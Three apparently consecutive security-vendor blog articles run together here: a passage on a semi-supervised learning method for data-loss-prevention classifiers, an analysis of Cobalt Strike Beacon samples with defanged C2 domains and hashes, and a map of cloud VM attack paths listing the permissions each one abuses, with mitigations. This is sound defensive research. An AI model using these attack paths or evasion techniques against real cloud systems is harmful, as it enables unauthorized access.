Our paper has a comprehensive overview of all our experimental results. We enumerate five different kinds of data quality issues (data variables) and then measure the sensitivity of five state-of-the-art SSL algorithms to these data variables.

Sensitivity refers to how big of an impact a data variable has on the results of an SSL algorithm. The five data variables in question are:

  • Few-shot: Changing the scarcity of labeled data.
  • Open-set: Changing the percentage of unlabeled data that belongs to no class.
  • Noisy-label: Changing the percentage of given labels that are incorrect.
  • Class imbalance/misalignment: Changing the class frequency distributions in the labeled and unlabeled sets separately (while the other remains balanced).

Each algorithm tested was optimized for a single, specific data variable. However, as we argue here, a practitioner rarely knows in advance what data variables they need to overcome. There is thus a gap in the practical usefulness of narrowly optimized methods.

We explore each data variable at three levels of severity. We construct our data variable scenarios by applying corruptions to two standard benchmark computer vision datasets (CIFAR-10 and CIFAR-100). In addition to our SSL algorithms, we train a supervised baseline in every scenario.

In brief, CCP is not the optimal solution for every scenario, but it demonstrates remarkable consistency. For example, it is the only algorithm outperforming the supervised baseline in every scenario.

We discovered one or more scenarios that result in catastrophic performance degradation for every other algorithm. This is shown in Table 1, which distills the minimum accuracy of each algorithm on our two datasets across all scenarios.

Algorithm CIFAR-10 CIFAR-100
CCP (Ours) 90.23% 61.38%
CoMatch 50.05% 47.94%
ACR 39.75% 22.07%
OpenMatch 43.08% 27.88%
FixMatch w/o DA 44.62% 41.84%
FixMatch w/ DA 46.97% 40.95%

Table 1. Minimum accuracies for each algorithm across all scenarios for both datasets.

CCP Applied to DLP

DLP is a critical cybersecurity task aimed at monitoring sensitive data within an organization and preventing its exfiltration. ML-powered DLP services feature models that must autonomously classify if a given document is sensitive or not sensitive. Often, models must also determine what kind of sensitive data lies within the document (e.g., financial, health, legal or source code).

For this demo, we apply CCP to a similar deep learning DLP classifier. To simplify, we assume the input document contains only text. However, CCP applies to any model tasked with ingesting documents of any modality. The demo document classifier recognizes multiple sensitive document classes and one non-sensitive class.

A practitioner faced with building such a classifier must overcome some fundamental challenges. By definition, the data you’d like to classify in deployment is unviewable due to privacy concerns.

Labeled datasets to train, test and validate a classifier must be gathered with publicly available versions of sensitive documents or custom synthetic samples. Both of those efforts are useful, but, in any non-trivial deployment scenario, there will inevitably be a large information gap between labeled data and production data.

The class frequency and content frequency distributions may vary widely. Also, new types of content for a given class may be present in production data but not in your labeled dataset. Naturally, the desire to train on real production data arises.

The rough sketch of applying CCP to a DLP classifier is as follows:

  1. We define a means to extract privatized versions of unlabeled sensitive production data
  2. We attach the lightweight architectural components necessary to compute CCP’s algorithms and losses to the existing classifier
  3. We repeat CCP iterations to iteratively refine a set of pseudo-labels for all the unlabeled data
  4. We use a combination of given labels and the final state of pseudo-labels to train a final inductive classifier

Working with Sensitive Data While Preserving Privacy

Many solutions have been proposed to train with private data. Popular solutions include federated learning, homomorphic encryption and differential privacy (DP).

A comparative discussion of these techniques is out-of-scope for this blog. We instead detail how one can use a combination of DP and CCP to train on production data in a privacy-preserving yet effective manner.

To understand DP, consider the following. Imagine you’re in a classroom and you have a secret – your favorite food is broccoli, but you don't want anyone to know. Now, suppose your teacher is taking a survey of everyone's favorite food in class. You don't want to lie, but you also don't want anyone to know your secret. This is where DP comes in.

Instead of telling your true favorite food, you decide to flip a coin. If it's heads, you tell the truth. If it's tails, you pick a food at random.

Now, even if your teacher says “someone in class likes broccoli,” no one will know for sure it's you, because it could have been a random choice. DP works similarly. It adds a bit of random "noise" to the data. The noise is enough to keep individual information private, but not so much that the overall trends in the data can't be seen.

Your teacher can still get a general idea of the class's favorite foods, even if they don’t know that you secretly love broccoli. The key aspect here is that by introducing the coin flip (or randomness), you're adding an element of plausible deniability.

Even if someone guessed that you chose broccoli, the coin flip introduces doubt, protecting your privacy. In the context of DLP document classification, we use DP to preserve the privacy of production documents while mostly preserving the general statistics of a large collection of documents.

We need a real-valued representation of the document to apply DP noise to and achieve its theoretical privacy guarantees. A special feature extraction model is typically used for this purpose. Its job is to non-reversibly convert a text document into a large collection of floating point numbers.

This representation is unreadable by a human but preserves the high-level semantics of the document (an additional layer of privacy). Industry-standard levels of DP noise are added to this floating point representation to ensure the representation can be safely extracted from production data.

Despite having privatized representations of sensitive documents, you must still overcome the fact that the representations are unlabeled. This is where CCP comes into play.

Neural Architecture Details

Our deep learning model takes in privatized representations of documents as input. Its task is to output the correct classification verdict for each input sample.

CCP also requires us to define a separate embedding space within which we will learn a similarity function that compares inputs. The similarity function will be trained to assign inputs of the same class with higher similarity than inputs of different classes.

This similarity function is trained with a contrastive loss allowing us to produce pseudo-labels transductively. The core architecture components of CCP are illustrated in Figure 9.

Image 9 is the equation of the architecture of the core components of the contrastive credibility propagation.
Figure 9. High-level illustration of the core architecture components of CCP.

The notation in Figure 9 is as follows:

  • \(x\) – An input sample
  • \(\mathcal{T}\) – The set of transformations
  • \(t\) – A randomly sampled transformation
  • \(f_b\) – The encoder network
  • \(f_z\) – The contrastive projection head
  • \(f_g\) – The classification projection head
  • \(\mathcal{L}_{\text{SSC}}\) – Softly supervised contrastive loss
  • \(\mathcal{L}_{\text{CLS}}\) – Standard cross-entropy classification loss

Firstly, in line with other work on contrastive learning, we define a set of transformations, \(\mathcal{T}\), over our data. The job of transformations is to corrupt the low-level details of an input while preserving its high-level class semantics.

For images, this could be random crops or color jitter. For text, this could be noise added to the embedding vectors or randomly hiding words.

Randomly drawing two transformations leads to two views of each input sample with the same class label. These transformations help the learned similarity metric and the classifier robustly overcome low-level noise.

An encoder network, \(f_b\), processes the transformed batch of data. The encoder’s job is to transform the input into a new encoded vector space.

The exact structure of \(f_b\) (a CNN, transformer, RNN, etc) depends only on what makes sense for your datatype. A transformer would be a common choice for DLP and natural language documents.

Two projection heads (\(f_z\) and \(f_g\)) bring the encoder outputs into two new vector spaces upon which we compute our loss functions. Each projection head is a multilayer perceptron (i.e., a short sequence of fully connected layers).

Concerning an existing deep learning DLP classifier, \(f_g\) would be the last layer of your classifier (upon which you compute softmax and your classification loss) while \(f_b\) would be everything prior. The \(f_z\) projection head, used to learn a similarity metric, would be the only new neural network component to add.

Learning and Applying a Similarity Metric

The algorithms and losses unique to CCP are computed within the vector space defined by \(f_z\). We define a novel contrastive loss to learn the similarity metric that is softly supervised.

 

Two popular contrastive loss functions are SimCLR and SupCon, which can be interpreted as unsupervised and supervised versions of the same loss. Both loss functions assume that positive and negative pairs are sampled discretely (pairs that should be similar and dissimilar, respectively). This is not the case when we have soft pseudo-labels. We only have variable confidence of positive pair relationship defined by the magnitude of the pseudo-label vector.

We describe a generalization of SimCLR and SupCon designed to work with this uncertainty, denoted \(\mathcal{L}_{\text{SSC}}\). Our study shows that SimCLR and SupCon losses are special cases of \(\mathcal{L}_{\text{SSC}}\).

Following the formalization of the algorithm visualized in Figure 5, we repeat the cycle of propagating pseudo-labels with this learned similarity metric followed by averaging pseudo-labels across epochs. We apply subsampling as defined above as necessary.

Once the process has converged, we use the final state of pseudo-labels to train a new inductive classifier consisting of \(f_b\) and \(f_g\). In practice, retaining \(f_z\) to compute \(\mathcal{L}_{\text{SSC}}\) during classifier training as an additional loss provides a classification performance boost. However, during inference, \(f_z\) is discarded.

Impact

We outline above the steps to train a DLP classifier on a combination of a curated labeled dataset and unlabeled, privatized production data with CCP. By doing so, you’ve made an important step toward aligning your machine learning model with your target production data distribution.

Despite achieving similarly high test set classification performance in internal experiments, DLP classifiers adjusted with CCP saw a 250% increase in successful detections of sensitive documents in a real-world test. This underscores the critical importance of ensuring the alignment of your ML models to the actual deployment data distributions. Traditional performance metrics on a test split of your curated dataset can sometimes be very misleading!

CCP provides a useful tool for practitioners to confidently align models when the deployment data distribution is unlabeled or even unviewable. DLP is just one experimental setting. CCP is general enough to provide value for any classifiers built on any partially labeled dataset.

Conclusion

We have reviewed the CCP algorithm, its core components and some benchmark analyses presented in depth at AAAI ‘24. We have discussed its specific, unique benefits compared to other semi-supervised learning algorithms.

We’ve walked through an example of applying CCP to DLP, a critical component of any enterprise cybersecurity solution. We’ve discussed why DLP is well suited to demonstrate CCP’s unique strengths.

Palo Alto Networks continues to improve state-of-the-art DLP. Enterprise DLP customers are better protected against sensitive data loss through CCP.

Additional Resources

Updated June 28, 2024, at 9:55 a.m. PT to correct the text. 

Attackers Exploiting Public Cobalt Strike Profiles

Executive Summary

In this article, Unit 42 researchers detail recent findings of malicious Cobalt Strike infrastructure. We also share examples of malicious Cobalt Strike samples that use Malleable C2 configuration profiles derived from the same profile hosted on a public code repository.

Cobalt Strike is a commercial software framework that enables security professionals like red team members to simulate attackers embedding themselves in a network environment. However, threat actors continue to use cracked versions of Cobalt Strike in real-world attacks. The post-exploitation payload called Beacon uses text-based profiles called Malleable C2 to change the characteristics of Beacon's web traffic in an attempt to avoid detection.

Despite its use in defensive cybersecurity assessments, threat actors continue to leverage Cobalt Strike for malicious purposes. Due to its malleable and evasive nature, Cobalt Strike remains a significant security threat to organizations.

Palo Alto Networks customers are better protected from Cobalt Strike Beacon and Team Server C2 communication in the following ways:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Cobalt Strike, Malleable C2 Profile

From Server to Beacon to Profile

Unit 42 has multiple techniques to find Cobalt Strike servers hosted on the internet, some of which we have documented in a previous article about Cobalt Strike analysis. The traffic flow and detection in this article were triggered by our Advanced Threat Prevention (ATP) solution.

After finding these Cobalt Strike servers, we pivoted on this information to discover any associated Beacon files. Our investigation of these samples revealed Malleable C2 profiles, which are described in another previous article about Malleable C2 profiles.

Our research also revealed that these Malleable C2 profiles borrow heavily from a single example hosted on a publicly available software repository.

First Sample

This first Beacon sample borrows from a Malleable C2 profile named ocsp.profile hosted on a publicly available software repository. This profile itself is not malicious, and it is one of many hosted on publicly available repositories that attackers can copy and alter for their own malicious purposes.

First sample SHA256 hash:

  • 1980becd2152f4c29dffbb9dc113524a78f8246d3ba57384caf1738142bb3a07

We downloaded this Beacon sample from one of the Cobalt Strike servers discovered by our ATP solution. Attackers typically retrieve Beacon instances from Cobalt Strike servers and load Beacon into memory through some other compromised process. Embedded in this Beacon binary are details from its Malleable C2 profile.

We used Didier Stevens’ Python script 1768.py to extract the Malleable C2 profile details. These details are listed below in Table 1.

Profile Component Description Details
GET Request to get the command to execute Method: GET

Cobalt Strike C2 domains:

  • msupdate.azurefd[.]net
  • o365updater.azureedge[.]net
  • gupdater.bbtecno[.]com
  • teamsupd.azurewebsites[.]net
  • msdn1357.centralus.cloudapp.azure[.]com
  • cupdater.bbtecno[.]com

URI:  /ocsp/

Header: User-Agent: Microsoft-CryptoAPI/7.0

Post Request to return the command execution result Method: POST

URI: /ocsp/a/

Table 1. Extracted network information from the profile of our first Beacon sample.

Below, Figure 1 shows part of the results from Stevens' Python script analysis of our first Beacon sample. This section contains information related to the sample's Malleable C2 profile configuration. As noted in the http_get_header section, metadata of the victim is encoded using lowercase NetBIOS encoding and appended to the request URI. This configuration also adds Accept: */* to the HTTP GET request header.

Image 1 is a screenshot of Python script. Red arrows point to the header section.
Figure 1. Output from running Stevens’ 1768.py script on our first Beacon sample.

Figure 2 shows a TCP stream of the HTTP C2 traffic between this Beacon instance and the Cobalt Strike server. In it, we can see the lower-case NetBIOS encoding in the GET request as specified by the Malleable C2 profile.

Image 2 is a screenshot of a Wireshark TCP stream for the command and control traffic. It includes the GET, Host (which is redacted) connection, and user agent information.
Figure 2. TCP stream of HTTP C2 traffic generated by our first Cobalt Strike Beacon sample.

This profile configuration appears to be based on the ocsp.profile from a publicly accessible software repository. The attackers merely replaced /oscp/ with /ocsp/ for both HTTP request methods and changed the User-Agent string from Microsoft-CryptoAPI/6.1 to Microsoft-CryptoAPI/7.0. Figure 3 indicates values from the original Malleable C2 profile that were altered for this Beacon sample. The rest of the profile used for this sample matches the original ocsp.profile content.

Image 3 is a screenshot of the GitHub page for user rsmudge’s Malleable C2 profile.
Figure 3. The original ocsp.profile, indicating the values updated in our first Beacon sample.

Second Sample

The Malleable C2 profile of our second Beacon sample borrows from the same ocsp.profile as our first sample.

Second sample SHA256 hash:

  • b587e215ce8c0b3a1525f136fe38bfdc0232300e1a4f7e651e5dc6e86313e941

Like our first example, this Beacon sample is a staged binary hosted by a Cobalt Strike server that our ATP platform detected and downloaded. Following the same analysis procedure, we extracted the Malleable C2 profile information using 1768.py and compared the results with our repository of known profiles. Table 2 shows the network information we extracted from this profile.

Profile Component Description Details
C2:

GET Request to get the command to execute

Method: GET

Cobalt Strike C2 domains:  

  • msupdate.brazilsouth.cloudapp.azure[.]com
  • msdn1357.centralus.cloudapp.azure[.]com
  • update37.eastus.cloudapp.azure[.]com
  • update.westus.cloudapp.azure[.]com
  • 146.235.52[.]69
  • 159.112.177[.]137

URI: /download/

Header: User-Agent: Microsoft-CryptoAPI/8.1

C2: 

Post Request to return the command execution result

Method: POST

URI: /pkg/a/

Table 2. Extracted network information from the profile of our second Beacon sample.

In this Beacon sample, the attackers updated the URI path replacing the original ocsp.profile value of the HTTP GET request from /oscp/ to /download/. Attackers also replaced the original value of the HTTP POST request from /oscp/a/ to /pkg/a/. Finally they updated the User-Agent value from Microsoft-CryptoAPI/6.1 to Microsoft-CryptoAPI/8.1.

Figure 4 shows a TCP stream of the HTTP C2 traffic between this second Beacon instance and its Cobalt Strike server.

Image 4 is a screenshot of a Wireshark TCP stream. The host has been redacted. The information includes the GET, Host (which is redacted) connection, and user agent.
Figure 4. TCP stream of HTTP C2 traffic generated by our second Cobalt Strike Beacon sample.

Third Sample

The Malleable C2 profile of our third sample borrows from the same ocsp.profile as our first and second samples.

Third sample SHA256 hash:

  • 38eeb82dbb5285ff6a2122a065cd1f820438b88a02057f4e31a1e1e5339feb2b

This third Cobalt Strike sample is a stageless 64-bit Windows executable file that uses the same ocsp.profile for its Malleable C2 profile, but with a twist. The domain for its C2 server contains a string in the leading subdomain that matches the FQDN of a well-known multinational technology company.

This FQDN for the Cobalt Strike C2 server is www.consumershop.lenovo.com.cn.d4e97cc6.cdnhwcggk22[.]com, however the parent domain is actually cdnhwcggk22[.]com.

Figure 5 shows an example of HTTP C2 traffic generated by this third sample, starting after a DNS query of the C2 domain resolves to the server's IP address.

A screenshot of infection traffic filtered in Wireshark.
Figure 5. Filtered in Wireshark, C2 traffic generated by our third Cobalt Strike sample.

Borrowing From Public Malleable C2 Profiles

Detections for Cobalt Strike activity that depend on patterns in network traffic from the HTTP request headers patterns are of limited value, since any variation of these patterns can cause the detection to fail. Some workarounds such as regular expression patterns can temporarily alleviate this evasion. However, attackers can trivially modify the Malleable C2 profile, creating a detection arms race where attackers remain one step ahead of conventional network security solutions. In these cases, the cost is imposed more heavily on the defender than the attacker.

Furthermore, attackers do not need to create a Malleable C2 profile from scratch. They can easily copy publicly available examples and modify various values to fit their needs. Our research indicates that attackers use slight modifications of these publicly available profiles for their Cobalt Strike activity in an effort to evade detection.

Conclusion

In the ever-evolving landscape of cybersecurity, attackers persist in finding new methods, like leveraging publicly available Malleable C2 profiles. This strategy enables attackers to initiate Cobalt Strike C2 communications with flexibility, frequently altering profiles to evade detection and sustain malicious activity. Such tactics underscore the dynamic nature of cyberthreats and the continuous need for adaptive and forward-thinking defense mechanisms.

Machine-learning based solutions like ATP are the best type of defensive countermeasures available for preventing highly evasive attacks and C2 like Cobalt Strike. Heuristic detections cannot cover the huge amount of permutations that the Malleable C2 framework can so readily provide.

The cost for network security false positives is skewed heavily against the defender, which is a vulnerability in security operations that attackers exploit to their benefit.

Adopting a machine-learning network security platform like ATP provides detection capabilities to counter these types of threats.

This commitment to advancing our technologies in response to these threats reaffirms our dedication to cybersecurity excellence and the safety of the digital community.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from Cobalt Strike through the following products:

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes for Cobalt Strike Samples:

  • 1980becd2152f4c29dffbb9dc113524a78f8246d3ba57384caf1738142bb3a07
  • B587e215ce8c0b3a1525f136fe38bfdc0232300e1a4f7e651e5dc6e86313e941
  • 38eeb82dbb5285ff6a2122a065cd1f820438b88a02057f4e31a1e1e5339feb2b

Domains and IP Addresses Used for Cobalt Strike C2:

  • msupdate.azurefd[.]net
  • o365updater.azureedge[.]net
  • gupdater.bbtecno[.]com
  • teamsupd.azurewebsites[.]net
  • msdn1357.centralus.cloudapp.azure[.]com
  • cupdater.bbtecno[.]com
  • msupdate.brazilsouth.cloudapp.azure[.]com
  • msdn1357.centralus.cloudapp.azure[.]com
  • update37.eastus.cloudapp.azure[.]com
  • update.westus.cloudapp.azure[.]com
  • www.consumershop.lenovo.com.cn.d4e97cc6.cdnhwcggk22[.]com
  • 146.235.52[.]69
  • 159.112.177[.]137

Additional Resources

 

Attack Paths Into VMs in the Cloud

Executive Summary

This post reviews strategies for identifying and mitigating potential attack vectors against virtual machine (VM) services in the cloud. Organizations can use this information to understand the potential risks associated with their VM services and strengthen their defense mechanisms. This research focuses on VM services offered by three major cloud service providers (CSPs): Amazon Web Services (AWS), Azure and Google Cloud Platform (GCP).

VMs are among the most frequently deployed resources in every cloud environment. Their widespread use also makes them a prime target for attackers. Our research shows that 11% of cloud hosts exposed to the internet contain vulnerabilities rated Critical or High severity.

A compromised VM can provide attackers with access to not only the data within the VM instance but also the permissions assigned to it. As compute workloads like VMs are generally ephemeral and immutable, the risk posed by a compromised identity is arguably greater than that of compromised data within a VM.

It is important to note that all the attack paths discussed in this post are intended features with legitimate use cases, such as streamlining the configuration, updating, and monitoring of VMs across hybrid or multi-cloud environments, rather than vulnerabilities. However, if security best practices are not followed, accounts are not protected, and careful attention isn't given to the design of your architecture, malicious users could misuse these services or features. The responsibility of protecting and mitigating these attack paths falls on the cloud users and administrators.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud customers are better protected by the attack path policies continuously monitoring and alerting on potential attack paths.
  • Cortex XDR detects and blocks exploits and evasive cloud-based attacks.
  • Cortex Xpanse can detect shadow IT running in public cloud providers and help bring these resources under management.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
Related Unit 42 Topics Cloud Cybersecurity Research

Summary of the VM Attack Paths

We explore the conditions and permissions for each attack path into a running VM instance to assist organizations in fine-tuning their detection and mitigation mechanisms. Table 1 provides an overview of all the attack paths we discuss.

AWS Azure GCP
Vulnerability Exploitation Feasible: Yes

Complexity: Depends

Feasible: Yes

Complexity: Depends

Feasible: Yes

Complexity: Depends

Startup Script Manipulation Feasible: Yes

Feature: EC2 User Data

Complexity: Low

Feasible: only VM Scale Sets

Feature: VM custom data

Complexity: Low

Feasible: Yes

Feature: Metadata Startup Scripts

Complexity: Low

SSH Key Push Feasible: Yes

Feature: EC2 Instance Connect

Complexity: Low

Feasible: Yes

Feature: VMAccess extension

Complexity: Medium

Feasible: Yes

Feature: Metadata, OSLogin

Complexity: Low

Direct Code Execution Feasible: Yes

Feature: SSM Run Command

Complexity: Medium

Feasible: Yes

Feature: Run Command, Custom Script Extension

Complexity: Low

Feasible: Yes

Feature: VM Manager

Complexity: Medium

SSH Over Middleware Feasible: Yes

Feature: SSM Session Manager

Complexity: Low

Feasible: No Feasible: No
Serial Console Access Feasible: Yes

Feature: EC2 Serial Console

Complexity: High

Feasible: Yes

Feature: Azure Serial Console

Complexity: High

Feasible: Yes

Feature: Metadata/Serial Console

Complexity: Low

Table 1. Summary of VM attack paths.

Understanding VMs in the Cloud

VMs are among the oldest and most widely used infrastructure-as-a-service (IaaS) offerings across all cloud service providers. They offer a swift and straightforward method to “lift and shift” on-premises applications to the cloud, maintaining the same user experience at the operating system level and above. Modern VM services support a broad spectrum of operating systems, from Linux to Windows to macOS, enabling virtually any application to be deployed in the cloud.

While VMs might not be the most novel cloud technology today, they continue to host many vital cloud workloads. If a VM is compromised, attackers can not only exfiltrate sensitive data and hijack computational resources but also gain access to all the cloud permissions granted to the VM.

As the tactics, techniques and procedures (TTPs) employed by attackers in the cloud largely depend on the permissions they have managed to obtain, one common method of gaining more permissions is to compromise a compute resource, such as a VM, and hijack its workload identity. As a result, each VM instance can potentially serve as a stepping stone towards an attacker's goal, making it crucial to meticulously manage the VM's attack surface.

We define a VM attack path as a series of steps and conditions that could potentially allow an attacker to log in or execute commands in a VM instance. We assume that attackers possess basic information about the targeted VM, such as its unique identifier (UID), IP address, virtual private cloud (VPC) and region.

This information, which is not typically considered confidential, can be sourced from logs, code, or low-privileged read permissions. However, attackers do not possess the login credentials for VMs. The majority of the attack paths discussed in this post rely on control plane application programming interfaces (APIs) to gain access to a VM.

Subsequent sections will each cover a specific technique and explore the attack paths related to that technique in each CSP. We will outline the preconditions for each attack path, noting that while these conditions are necessary, they might not be sufficient. For instance, to exploit these attack paths, we assume the attackers have obtained the required permissions through means such as credential leaks or phishing in order to exploit a specific attack path.

We will focus on the most relevant permissions or configurations that result in these attack paths. Although most of the techniques described are not specific to any particular VM operating system, for simplicity, the references and examples provided will primarily be based on Linux systems.

Vulnerability Exploitation

Our research reveals that 11% of the cloud hosts exposed to the internet contain Critical or High severity vulnerabilities. Exploiting these vulnerabilities is one of the most common ways attackers use to gain initial access to cloud environments.

Given that modern applications are bundled with hundreds of dependent packages, the emergence of new vulnerabilities is accelerating faster than ever. Regardless of the instance type and cloud type, if attackers can identify a remotely exploitable vulnerability exposed by a VM, they could potentially compromise and take control of it.

Conditions:

  • The target VM has a vulnerability exposed to the network that can be exploited remotely.
  • The vulnerability allows remote code execution, file access or file overwriting.

Mitigations:

Startup Script Manipulation

A startup script is a file that executes tasks during the initialization process of a VM instance. These scripts are typically used to set up the environment, download dependencies, initialize services and fetch updates. If attackers gain permissions to alter a VM's startup script, they could exploit this feature to inject malicious code into the VMs.

AWS: Modify Startup Scripts in User Data

When launching a new EC2 instance, users can optionally pass parameters or scripts in user data. Any scripts in user data are run when the instance is launched. By default, the scripts are only executed during the first boot of the instance. However, it is possible to configure the cloud-init directives to force scripts to execute at every restart.

Conditions:

  • The Amazon Machine Images (AMI) used for creating EC2 VM must support the user data and cloud-init functionality.
  • The principals have the following permissions to alter a VM’s user data and restart the VM:
    • ec2:StopInstances
    • ec2:ModifyInstanceAttribute
    • ec2:StartInstances

Mitigations:

  • Restrict and monitor the use of the ec2:ModifyInstanceAttribute permission.

Azure: Modify Startup Scripts in Custom Data

The startup scripts are stored and passed to an Azure VM via its custom data. For a single VM, its custom data can only be set once at boot time and can’t be updated subsequently. However, custom data of a VM Scale Set, a group of VMs, can be updated.

Newly initiated VMs will receive the updated custom data. Existing VMs, on the other hand, need to be reimaged to receive the new custom data.

Conditions:

  • The principals have the following permissions to update the state of a VM scale set and reimage a VM.
    • Microsoft.Compute/virtualMachineScaleSets/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachineScaleSets/write permission.

GCP: Modify Startup Scripts in Metadata

Compute Engine’s metadata service offers a mechanism for storing and retrieving metadata in the form of key-value pairs, including startup/shutdown scripts, SSH keys and numerous feature flags. Metadata can be set at instance-level for each individual VM or project-wide level for all VMs within the project. Each VM is then configured according to its respective metadata.

The startup-script metadata key contains the commands that run when a VM instance boots.

Conditions:

  • The guest agent is installed and activated.
  • The principals have the following permissions to update a VM’s metadata:
  • The principals have the following permissions to restart or reboot a VM:
    • compute.instances.stop
    • compute.instances.start
    • compute.instances.reset

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • It is recommended to store startup scripts in cloud storage rather than metadata directly and using the startup-script-url metadata key to point to it. This better secures potentially sensitive information in the startup script through change control and additional access controls as well as allows for a script greater than 256 KB in size.

SSH Key Push

Given that each organization typically hosts various applications on hundreds (if not thousands) of VM instances in their cloud environments, managing the SSH keys for all these VMs can be a daunting task. To help streamline the process of credential management and access control, most CSPs offer features that allow for the easy insertion of SSH public keys into running VMs.

This process usually involves an agent running within a VM, fetching a public key from a cloud API endpoint, modifying the SSH daemon (sshd) configuration file and overwriting the authorized_keys file on the VM. If attackers gain permissions to push SSH keys, they could exploit this feature to gain unauthorized access to VMs.

AWS: Use EC2 Instance Connect to Push SSH Keys

EC2 Instance Connect provides a simple and secure method to manage SSH access to Linux VMs using identity and access management (IAM). When a user needs to SSH into a VM, Instance Connect pushes a temporary public key to the VM, allowing the user to authenticate with the SSH daemon.

Conditions:

  • The EC2 Instance Connect agent is installed and activated. The VM itself doesn’t require any permissions.
  • The principals have the following permission to push SSH keys:
    • ec2-instance-connect:SendSSHPublicKey

Mitigations:

  • Restrict and monitor the use of the ec2-instance-connect:SendSSHPublicKey permission.
  • Uninstall the EC2 Instance Connect if the feature is not needed.

Azure: Use VMAccess Extension to Push SSH Keys

VM Extensions are small applications that facilitate post-deployment configuration and automation on VM instances. These extensions offer functions such as system configuration, system monitoring and system backup.

The VMAccess extension allows the management of administrative users on Linux VMs for tasks like setting a user’s password, pushing an SSH public key or creating a new sudo user. The az vm user command relies on the VMAccess extension to manage user accounts in a VM.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permission to install an extension and update user accounts:
    • Microsoft.Compute/virtualMachines/extensions/write
    • Microsoft.Compute/virtualMachines/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/extensions/write and Microsoft.Compute/virtualMachines/write permissions.
  • Restrict the type of extension that can be installed on VMs.
  • Remove the VMAccess extension if it is not needed.

GCP: Update Metadata to Push SSH Keys

Compute Engine’s metadata service offers a mechanism for storing and retrieving metadata in the form of key-value pairs. By updating the SSH keys metadata key, one can add SSH public keys to a VM instance.

Conditions:

  • The guest agent is installed and activated.
  • The principals have the following permission to update a VM’s metadata:

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • Block metadata-based SSH Keys at the project level.

GCP: Use OSLogin to Push SSH Keys

OSLogin automatically manages SSH keys in metadata and user accounts in VM instances using Google Cloud Identity (IAM) policies. This is the recommended way to manage SSH keys in VMs.

OSLogin can be enabled by updating the enable-oslogin metadata key in the metadata service. It is important to note that metadata-based SSH keys and OSLogin are two mutually exclusive features that can’t both be enabled.

Conditions:

  • OSLogin agent is activated.
  • The principals have the following permissions to update a VM’s metadata:
  • The principals are associated with the compute.osLogin role to connect to VMs using OSLogin.
  • The principals, if outside of the organization, have the following permission
    • compute.oslogin.updateExternalUser

Mitigations:

  • Restrict and monitor the use of the compute.instances.osLogin and compute.oslogin.updateExternalUser permissions.
  • Enforce OS Login with 2FA at the project level.
  • Enforce physical security keys for operating system (OS) Login at the project level.

Direct Code Execution

To streamline the management and configurations of a fleet of VM instances, most CSPs offer features that allow the execution of commands or scripts across a set of VMs. This eliminates the need for VMs to have exposed management ports, bastion hosts or even an active sshd running, increasing their security and cost-effectiveness.

These features usually rely on agents running in the VMs that fetch and execute commands from the cloud API endpoints. If attackers gain the necessary permissions to perform these actions, they could exploit these features to execute malicious code within the VMs.

AWS: Use SSM Run Command to Execute Code

The SSM Run Command allows users to execute commands on nodes where the System Manager is installed. The feature offers an easy way for performing one-time configurations or status checks across nodes in single-cloud, multi-cloud or hybrid cloud environments.

Conditions:

  • The SSM agent is installed and activated.
  • The VM has the permissions specified in the AmazonSSMManagedInstanceCore policy.
  • The principals have the following permission
    • ssm:SendCommand

Mitigations:

  • Restrict and monitor the use of the ssm:SendCommand permission.
  • Restrict the SSM documents that Run Command can execute.
  • Revoke SSM permissions from VMs that are not managed by SSM.
  • Deactivate the Default Host Management Configuration if it is not needed. This feature allows AWS System Manager to manage all the qualified EC2 instances.

Azure: Use Virtual Machine Run Command to Execute Code

The Run Command feature in Azure uses the VM agent within a VM to execute scripts. It can be used for application management, system diagnostics or troubleshooting when RDP or SSH service are unavailable.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permission to perform the Run Command
    • Microsoft.Compute/virtualMachines/runCommands/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/runCommands/write permission.

Azure: Use a Custom Script Extension to Run Scripts

VM Extensions are small applications that can perform post-deployment configuration and automation on VM instances. The custom script extension allows for the downloading and execution of scripts within VMs.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permission to install an extension and run the custom script extension
    • Microsoft.Compute/virtualMachines/extensions/write
    • Microsoft.Compute/virtualMachines/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/extensions/write and Microsoft.Compute/virtualMachines/write permissions.
  • Restrict the type of extension that can be installed.

GCP: Use VM Manager to Execute Code

VM Manager is a suite of tools that can help manage a group of VMs. It is primarily used for applying patches, collecting OS information and installing or removing software packages.

Run Pre-Patch or Post-Patch Scripts

The Patch feature can apply OS patches across a set of VM instances using OS package managers like the Advanced Packaging Tool (APT) and Yellowdog Updater, Modified (YUM). During the creation of a patch job, optional pre-patch or post-patch scripts can be executed to either prepare for or test the patch.

Run Scripts in OS Policies

The OS Policy feature allows users to maintain a consistent configuration in OSes across multiple VMs. Each policy file contains the declarative configuration for resources such as packages, repositories or files. One way to configure resources in an OS is executing scripts.

Conditions:

  • The guest agent is installed and activated.
  • OS Config is enabled in the metadata.
  • The OS Config agent is installed and activated.
  • The VM must have an attached service account, although the service account doesn’t need any permission.
  • The principals need the following permissions to run a patch job:
    • osconfig.patchJobs.exec
    • osconfig.patchJobs.get
    • osconfig.patchJobs.list
  • The principals need the following permissions to manage OS policy assignments:
    • osconfig.osPolicyAssignments.update
    • osconfig.osPolicyAssignments.get
